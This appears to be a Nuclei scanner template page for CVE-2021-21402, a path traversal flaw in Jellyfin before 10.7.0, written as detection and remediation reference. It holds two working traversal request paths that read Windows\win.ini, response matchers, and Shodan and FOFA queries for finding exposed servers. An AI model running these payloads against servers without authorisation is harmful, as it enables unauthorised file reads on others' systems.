Skip to content

Jellyfin <10.7.0 - Local File Inclusion

ID: CVE-2021-21402

Severity: medium

Author: dwisiswant0

Tags: cve,cve2021,jellyfin,lfi

Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk.

id: CVE-2021-21402
info:
name: Jellyfin <10.7.0 - Local File Inclusion
author: dwisiswant0
severity: medium
description: |
Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: This is fixed in version 10.7.1.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx
- https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1
- https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7
- https://nvd.nist.gov/vuln/detail/CVE-2021-21402
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-21402
cwe-id: CWE-22
epss-score: 0.2223
epss-percentile: 0.96475
cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: jellyfin
product: jellyfin
shodan-query:
- http.html:"Jellyfin"
- http.html:"jellyfin"
- http.title:"jellyfin"
fofa-query:
- title="Jellyfin" || body="http://jellyfin.media"
- title="jellyfin"
- body="jellyfin"
- title="jellyfin" || body="http://jellyfin.media"
google-query: intitle:"jellyfin"
tags: cve,cve2021,jellyfin,lfi
http:
- method: GET
path:
- "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
- "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Content-Type: application/octet-stream"
- type: regex
part: body
regex:
- "\\[(font|extension|file)s\\]"
- type: status
status:
- 200
# digest: 4a0a0047304502200881c13f3749b1b8cf85ab318589d37e276fdf26e499ead2e58c844b11257eef022100f1a88b02e5d4f865ebba32533d0c2fc8570ea77c0d732de387ff4f151e6d37bc:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21402.yaml"

View on Github